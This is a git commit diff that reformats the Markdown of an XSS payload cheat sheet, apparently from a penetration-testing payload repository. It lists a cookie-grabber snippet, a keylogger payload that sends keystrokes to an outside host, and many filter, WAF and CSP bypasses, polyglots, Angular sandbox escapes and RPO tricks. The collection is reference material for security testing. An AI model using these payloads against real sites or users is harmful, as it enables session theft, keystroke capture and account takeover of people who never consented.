Markdown formatting update

2025-10-29 16:57:02 +00:00 · 2018-08-12 23:30:22 +02:00
parent 177c12cb79
commit 65654f81a4
40 changed files with 1375 additions and 827 deletions
--- a/injection/README.md
+++ b/injection/README.md
@@ -1,18 +1,20 @@
 # Cross Site Scripting
+
 Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.

- - [Exploit code or POC](#exploit-code-or-poc)
- - [Identify an XSS endpoint](#identify-an-xss-endpoint)
- - [XSS in HTML/Applications](#xss-in-htmlapplications)
- - [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri)
- - [XSS in files](#xss-in-files)
- - [Polyglot XSS](#polyglot-xss)
- - [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads)
- - [Common WAF Bypas](#common-waf-bypass)
+- [Exploit code or POC](#exploit-code-or-poc)
+- [Identify an XSS endpoint](#identify-an-xss-endpoint)
+- [XSS in HTML/Applications](#xss-in-htmlapplications)
+- [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri)
+- [XSS in files](#xss-in-files)
+- [Polyglot XSS](#polyglot-xss)
+- [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads)
+- [Common WAF Bypas](#common-waf-bypass)

 ## Exploit code or POC

 Cookie grabber for XSS
+
 ```php
 <?php
 // How to use it
@@ -28,26 +30,30 @@ fclose($fp);
 ```

 Keylogger for XSS
+
 ```html
 <img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>
 ```

 More exploits at [http://www.xss-payloads.com/payloads-list.html?a#category=all](http://www.xss-payloads.com/payloads-list.html?a#category=all):
-  - [Taking screenshots using XSS and the HTML5 Canvas](https://www.idontplaydarts.com/2012/04/taking-screenshots-using-xss-and-the-html5-canvas/)
-  - [JavaScript Port Scanner](http://www.gnucitizen.org/blog/javascript-port-scanner/)
-  - [Network Scanner](http://www.xss-payloads.com/payloads/scripts/websocketsnetworkscan.js.html)
-  - [.NET Shell execution](http://www.xss-payloads.com/payloads/scripts/dotnetexec.js.html)
-  - [Redirect Form](http://www.xss-payloads.com/payloads/scripts/redirectform.js.html)
-  - [Play Music](http://www.xss-payloads.com/payloads/scripts/playmusic.js.html)

+- [Taking screenshots using XSS and the HTML5 Canvas](https://www.idontplaydarts.com/2012/04/taking-screenshots-using-xss-and-the-html5-canvas/)
+- [JavaScript Port Scanner](http://www.gnucitizen.org/blog/javascript-port-scanner/)
+- [Network Scanner](http://www.xss-payloads.com/payloads/scripts/websocketsnetworkscan.js.html)
+- [.NET Shell execution](http://www.xss-payloads.com/payloads/scripts/dotnetexec.js.html)
+- [Redirect Form](http://www.xss-payloads.com/payloads/scripts/redirectform.js.html)
+- [Play Music](http://www.xss-payloads.com/payloads/scripts/playmusic.js.html)

 ## Identify an XSS endpoint
+
 ```javascript
 <script>debugger;</script>
 ```

 ## XSS in HTML/Applications
+
 XSS Basic
+
 ```javascript
 Basic payload
 <script>alert('XSS')</script>
@@ -75,6 +81,7 @@ Svg payload
 ```

 XSS for HTML5
+
 ```javascript
 <body onload=alert(/XSS/.source)>
 <input autofocus onfocus=alert(1)>
@@ -90,6 +97,7 @@ XSS for HTML5
 ```

 XSS using script tag (external payload)
+
 ```javascript
 <script src=14.rs>
 you can also specify an arbitratry payload with 14.rs/#payload
@@ -97,6 +105,7 @@ e.g: 14.rs/#alert(document.domain)
 ```

 XSS in META tag
+
 ```javascript
 Base64 encoded
 <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
@@ -108,32 +117,37 @@ With an additional URL
 ```

 XSS in Hidden input
+
 ```javascript
 <input type="hidden" accesskey="X" onclick="alert(1)">
 Use CTRL+SHIFT+X to trigger the onclick event
 ```

 DOM XSS
+
 ```javascript
 #"><img src=/ onerror=alert(2)>
 ```

 XSS in JS Context (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic)
+
 ```javascript
 -(confirm)(document.domain)//
 ; alert(1);//
 ```

 XSS URL
+
 ```javascript
 URL/<svg onload=alert(1)>
 URL/<script>alert('XSS');//
 URL/<input autofocus onfocus=alert(1)>
 ```

-
 ## XSS in wrappers javascript and data URI
+
 XSS with javascript:
+
 ```javascript
 javascript:prompt(1)

@@ -160,6 +174,7 @@ javascript://anything%0D%0A%0D%0Awindow.alert(1)
 ```

 XSS with data:
+
 ```javascript
 data:text/html,<script>alert(0)</script>
 data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
@@ -167,19 +182,23 @@ data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
 ```

 XSS with vbscript: only IE
+
 ```javascript
 vbscript:msgbox("XSS")
 ```
+
 ## XSS in files
+
 ** NOTE:** The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup.
+
 ```xml
 <name>
  <value><![CDATA[<script>confirm(document.domain)</script>]]></value>
 </name>
 ```

+XSS in XML

-XSS in XML      
 ```xml
 <html>
 <head></head>
@@ -189,8 +208,8 @@ XSS in XML
 </html>
 ```

-
 XSS in SVG
+
 ```xml
 <?xml version="1.0" standalone="no"?>
 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
@@ -204,32 +223,33 @@ XSS in SVG
 ```

 XSS in SVG (short)
+
 ```javascript
 <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

-
 <svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
 <svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
 <svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
 ```

 XSS in SWF flash application
-```
+
+```powershell
 Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
 IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}
 IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);

-
 InsecureFlashFile.swf
 location to url: InsecureFlashFile.swf?a=location&c=http://www.google.com/
 open url to new window: InsecureFlashFile.swf?a=open&c=http://www.google.com/
 http request to url: InsecureFlashFile.swf?a=get&c=http://www.google.com/
 eval js codz: InsecureFlashFile.swf?a=eval&c=alert(document.domain)
 ```
+
 more payloads in ./files

-
 XSS in SWF flash application
+
 ```javascript
 flashmediaelement.swf?jsinitfunctio%gn=alert`1`
 flashmediaelement.swf?jsinitfunctio%25gn=alert(1)
@@ -249,8 +269,8 @@ flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}//
 phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}//
 ```

-
 XSS in CSS
+
 ```html
 <!DOCTYPE html>
 <html>
@@ -268,29 +288,34 @@ div  {
 </html>
 ```

-
 ## Polyglot XSS
+
 Polyglot XSS - 0xsobky
+
 ```javascript
 jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
 ```

 Polyglot XSS - Ashar Javed
+
 ```javascript
 ">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
 ```

 Polyglot XSS - Mathias Karlsson
+
 ```javascript
 " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
 ```

 Polyglot XSS - Rsnake
+
 ```javascript
 ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
 ```

 Polyglot XSS - Daniel Miessler
+
 ```javascript
 javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
 javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
@@ -307,30 +332,34 @@ javascript://--></title></style></textarea></script><svg "//' onclick=alert()//

 Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514)
 ![https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg](https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg)
+
 ```javascript
 -->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
 ```
+
 ![https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large](https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large)
+
 ```javascript
 <svg%0Ao%00nload=%09((pro\u006dpt))()//
 ```

-
-
 ## Filter Bypass and exotic payloads

 Bypass case sensitive
+
 ```javascript
 <sCrIpt>alert(1)</ScRipt>
 ```

 Bypass tag blacklist
+
 ```javascript
 <script x>
 <script x>alert('XSS')<script y>
 ```

 Bypass word blacklist with code evaluation
+
 ```javascript
 eval('ale'+'rt(0)');
 Function("ale"+"rt(1)")();
@@ -341,18 +370,20 @@ Set.constructor('ale'+'rt(13)')();
 Set.constructor`al\x65rt\x2814\x29```;
 ```

-
 Bypass with incomplete html tag - IE/Firefox/Chrome/Safari
+
 ```javascript
 <img src='1' onerror='alert(0)' <
 ```

 Bypass quotes for string
+
 ```javascript
 String.fromCharCode(88,83,83)
 ```

 Bypass quotes in script tag
+
 ```javascript
 http://localhost/bla.php?test=</script><script>alert(1)</script>
 <html>
@@ -363,6 +394,7 @@ http://localhost/bla.php?test=</script><script>alert(1)</script>
 ```

 Bypass quotes in mousedown event
+
 ```javascript
 <a href="" onmousedown="var name = '&#39;;alert(1)//'; alert('smthg')">Link</a>

@@ -370,38 +402,45 @@ You can bypass a single quote with &#39; in an on mousedown event handler
 ```

 Bypass dot filter
+
 ```javascript
 <script>window['alert'](document['domain'])<script>
 ```

 Bypass parenthesis for string - Firefox
+
 ```javascript
 alert`1`
 ```

 Bypass onxxxx= blacklist
+
 ```javascript
 <object onafterscriptexecute=confirm(0)>
 <object onbeforescriptexecute=confirm(0)>
 ```

 Bypass onxxx= filter with a null byte/vertical tab - IE/Safari
+
 ```javascript
 <img src='1' onerror\x00=alert(0) />
 <img src='1' onerror\x0b=alert(0) />
 ```

 Bypass onxxx= filter with a '/' - IE/Firefox/Chrome/Safari
+
 ```javascript
 <img src='1' onerror/=alert(0) />
 ```

 Bypass space filter with "/" - IE/Firefox/Chrome/Safari
+
 ```javascript
 <img/src='1'/onerror=alert(0)>
 ```

 Bypass space filter with 0x0c/^L
+
 ```javascript
 <svgonload=alert(1)>

@@ -411,13 +450,14 @@ $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
 00000010: 6572 7428 3129 0c3e 0a                   ert(1).>.
 ```

-
 Bypass document blacklist
+
 ```javascript
 <div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
 ```

 Bypass using javascript inside a string
+
 ```javascript
 <script>
 foo="text </script><script>alert(1)</script>";
@@ -425,6 +465,7 @@ foo="text </script><script>alert(1)</script>";
 ```

 Bypass using an alternate way to redirect
+
 ```javascript
 location="http://google.com"
 document.location = "http://google.com"
@@ -434,6 +475,7 @@ window['location']['href']="http://google.com"
 ```

 Bypass using an alternate way to execute an alert - [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040)
+
 ```javascript
 window['alert'](0)
 parent['alert'](1)
@@ -452,6 +494,7 @@ content['alert'](6)
 ```

 Bypass using an alternate way to execute an alert - [@404death](https://twitter.com/404death/status/1011860096685502464)
+
 ```javascript
 eval('ale'+'rt(0)');
 Function("ale"+"rt(1)")();
@@ -474,8 +517,8 @@ Set.constructor('ale'+'rt(13)')();
 Set.constructor`al\x65rt\x2814\x29```;
 ```

-
 Bypass using an alternate way to trigger an alert
+
 ```javascript
 var i = document.createElement("iframe");
 i.onload = function(){
@@ -497,11 +540,13 @@ XSSObject.proxy(window, 'alert', 'window.alert', false);
 ```

 Bypass ">" using nothing #trololo (you don't need to close your tags)
+
 ```javascript
 <svg onload=alert(1)//
 ```

 Bypass ';' using another character
+
 ```javascript
 'te' * alert('*') * 'xt';
 'te' / alert('/') / 'xt';
@@ -521,22 +566,25 @@ Bypass ';' using another character
 ```

 Bypass using HTML encoding
+
 ```javascript
 %26%2397;lert(1)
 ```

 Bypass using Katakana (https://github.com/aemkei/katakana.js)
+
 ```javascript
 javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
 ```

 Bypass using Octal encoding
+
 ```javascript
 javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76'
 ```

-
 Bypass using Unicode
+
 ```javascript
 Unicode character U+FF1C FULLWIDTH LESSTHAN SIGN (encoded as %EF%BC%9C) was
 transformed into U+003C LESSTHAN SIGN (<)
@@ -562,6 +610,7 @@ E.g : http://www.example.net/something%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert
 ```

 Bypass using Unicode converted to uppercase
+
 ```javascript
 İ (%c4%b0).toLowerCase() => i
 ı (%c4%b1).toUpperCase() => I
@@ -573,6 +622,7 @@ Bypass using Unicode converted to uppercase
 ```

 Bypass using overlong UTF-8
+
 ```javascript
 < = %C0%BC = %E0%80%BC = %F0%80%80%BC
 > = %C0%BE = %E0%80%BE = %F0%80%80%BE
@@ -583,23 +633,27 @@ Bypass using overlong UTF-8
 ```

 Bypass using UTF-7
+
 ```javascript
 +ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
 ```

 Bypass using UTF-16be
+
 ```javascript
 %00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00
 \x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00>
 ```

 Bypass using UTF-32
+
 ```js
 %00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
 ```

 Bypass using BOM - Byte Order Mark (The page must begin with the BOM character.)    
 BOM character allows you to override charset of the page
+
 ```js
 BOM Character for UTF-16 Encoding:
 Big Endian : 0xFE 0xFF
@@ -614,11 +668,13 @@ XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o

 Bypass CSP using JSONP from Google (Trick by [@apfeifer27](https://twitter.com/apfeifer27))       
 //google.com/complete/search?client=chrome&jsonp=alert(1);
+
 ```js
 <script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"   
 ```

 Bypass using weird encoding or native interpretation to hide the payload (alert())
+
 ```javascript
 <script>\u0061\u006C\u0065\u0072\u0074(1)</script>
 <img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" />
@@ -628,6 +684,7 @@ Bypass using weird encoding or native interpretation to hide the payload (alert(
 ```

 Exotic payloads
+
 ```javascript
 <img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
 <script>$=1,alert($)</script>
@@ -645,12 +702,15 @@ Exotic payloads
 ## Common WAF Bypass

 ### Chrome Auditor - 9th august
+
 ```javascript
 </script><svg><script>alert(1)-%26apos%3B
 ```
+
 Live example by @brutelogic - [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c1=</script><svg><script>alert(1)-%26apos%3B)

 ### Incapsula WAF Bypass - 8th march
+
 ```javascript
 anythinglr00</script><script>alert(document.domain)</script>uxldz

@@ -658,31 +718,34 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
 ```

 ### Akamai WAF bypass by @zseano - 18th june
+
 ```javascript
 ?"></script><base%20c%3D=href%3Dhttps:\mysite>
 ```

 ## More fun ?
-This section will be used for the "fun/interesting/useless" stuff.     

-Use notification box instead of an alert - by [@brutelogic](https://twitter.com/brutelogic)    
+This section will be used for the "fun/interesting/useless" stuff.
+
+Use notification box instead of an alert - by [@brutelogic](https://twitter.com/brutelogic)
 Note : it requires user permission
-```
+
+```javascript
 Notification.requestPermission(x=>{new(Notification)(1)})
 ```

 Try here : [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermission(x=>%7Bnew(Notification)(1)%7D)//)

-
 ## Thanks to
-* https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
-* tbm
-* http://infinite8security.blogspot.com/2016/02/welcome-readers-as-i-promised-this-post.html
-* http://www.thespanner.co.uk/2014/03/21/rpo/
-* http://blog.innerht.ml/rpo-gadgets/
-* http://support.detectify.com/customer/portal/articles/2088351-relative-path-overwrite
-* http://d3adend.org/xss/ghettoBypass
-* http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html
-* http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html
-* https://medium.com/@tbmnull/making-an-xss-triggered-by-csp-bypass-on-twitter-561f107be3e5
-* https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309
+
+- [Unleashing-an-Ultimate-XSS-Polyglot](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)
+- tbm
+- [(Relative Path Overwrite) RPO XSS - Infinite Security](http://infinite8security.blogspot.com/2016/02/welcome-readers-as-i-promised-this-post.html)
+- [RPO TheSpanner](http://www.thespanner.co.uk/2014/03/21/rpo/)
+- [RPO Gadget - innerthmtl](http://blog.innerht.ml/rpo-gadgets/)
+- http://support.detectify.com/customer/portal/articles/2088351-relative-path-overwrite
+- http://d3adend.org/xss/ghettoBypass
+- http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html
+- http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html
+- https://medium.com/@tbmnull/making-an-xss-triggered-by-csp-bypass-on-twitter-561f107be3e5
+- https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309
--- a/injection/XSS
+++ b/injection/XSS
@@ -1,11 +1,14 @@
-## XSS in Angular
+# XSS in Angular
+
 Angular 1.6.0
-```
+
+```javascript
 {{0[a='constructor'][a]('alert(1)')()}}
 ```

 Angular 1.5.9
-```
+
+```javascript
 {{
    c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
    c.$apply=$apply;c.$eval=b;op=$root.$$phase;
@@ -23,22 +26,26 @@ Angular 1.5.9
 ```

 Angular 1.5.0 - 1.5.8
-```
+
+```javascript
 {{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
 ```

 Angular 1.4.0 - 1.4.9
-```
+
+```javascript
 {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
 ```

 Angular 1.3.20
-```
+
+```javascript
 {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
 ```

 Angular 1.3.19
-```
+
+```javascript
 {{
    'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
    $eval('x=alert(1)//');
@@ -46,14 +53,16 @@ Angular 1.3.19
 ```

 Angular 1.3.3 - 1.3.18
-```
+
+```javascript
 {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
  'a'.constructor.prototype.charAt=[].join;
  $eval('x=alert(1)//');  }}
 ```

 Angular 1.3.1 - 1.3.2
-```
+
+```javascript
 {{
    {}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
    'a'.constructor.prototype.charAt=''.valueOf;
@@ -62,7 +71,8 @@ Angular 1.3.1 - 1.3.2
 ```

 Angular 1.3.0
-```
+
+```javascript
 {{!ready && (ready = true) && (
      !call
      ? $$watchers[0].get(toString.constructor.prototype)
@@ -80,31 +90,37 @@ Angular 1.3.0
 ```

 Angular 1.2.24 - 1.2.29
-```
+
+```javascript
 {{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
 ```

 Angular 1.2.19 - 1.2.23
-```
+
+```javascript
 {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
 ```

 Angular 1.2.6 - 1.2.18
-```
+
+```javascript
 {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
 ```

 Angular 1.2.2 - 1.2.5
-```
+
+```javascript
 {{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
 ```

 Angular 1.2.0 - 1.2.1
-```
+
+```javascript
 {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
 ```

 Angular 1.0.1 - 1.1.5
-```
+
+```javascript
 {{constructor.constructor('alert(1)')()}}
 ```
--- a/injection/XSS
+++ b/injection/XSS
@@ -1,15 +1,16 @@
-## XSS with Relative Path Overwrite - IE 8/9 and lower
+# XSS with Relative Path Overwrite - IE 8/9 and lower

 You need these 3 components
-```
+
+```javascript
 1) stored XSS that allows CSS injection. : {}*{xss:expression(open(alert(1)))}
 2) URL Rewriting.
 3) Relative addressing to CSS style sheet : ../style.css
-
 ```

 A little example
-```
+
+```html
 http://url.example.com/index.php/[RELATIVE_URL_INSERTED_HERE]
 <html>
 <head>
@@ -23,23 +24,21 @@ Stored XSS with CSS injection - Hello {}*{xss:expression(open(alert(1)))}
 ```

 Explanation of the vulnerability
-```
-The Meta element forces IE’s document mode into IE7 compat which is required to execute expressions. Our persistent text {}*{xss:expression(open(alert(1)))is included on the page and in a realistic scenario it would be a profile page or maybe a shared status update which is viewable by other users. We use “open” to prevent client side DoS with repeated executions of alert.

-A simple request of “rpo.php/” makes the relative style load the page itself as a style sheet. The actual request is “/labs/xss_horror_show/chapter7/rpo.php/styles.css” the browser thinks there’s another directory but the actual request is being sent to the document and that in essence is how an RPO attack works.
+> The Meta element forces IE’s document mode into IE7 compat which is required to execute expressions. Our persistent text {}*{xss:expression(open(alert(1)))is included on the page and in a realistic scenario it would be a profile page or maybe a shared status update which is viewable by other users. We use “open” to prevent client side DoS with repeated executions of alert.
+> A simple request of “rpo.php/” makes the relative style load the page itself as a style sheet. The actual request is “/labs/xss_horror_show/chapter7/rpo.php/styles.css” the browser thinks there’s another directory but the actual request is being sent to the document and that in essence is how an RPO attack works.

-Demo 1 at http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php
-Demo 2 at http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo2.php/fakedirectory/fakedirectory2/fakedirectory3
-MultiBrowser : http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo3.php
-
-
-From : http://www.thespanner.co.uk/2014/03/21/rpo/
-```
+Demo 1 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php`
+Demo 2 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo2.php/fakedirectory/fakedirectory2/fakedirectory3`
+MultiBrowser : `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo3.php`

+From : `http://www.thespanner.co.uk/2014/03/21/rpo/`

 ## Mutated XSS for Browser IE8/IE9
-```
+
+```javascript
 <listing id=x>&lt;img src=1 onerror=alert(1)&gt;</listing>
 <script>alert(document.getElementById('x').innerHTML)</script>
 ```
- IE will read and write (decode) HTML multiple time and attackers XSS payload will mutate and execute.
+
+IE will read and write (decode) HTML multiple time and attackers XSS payload will mutate and execute.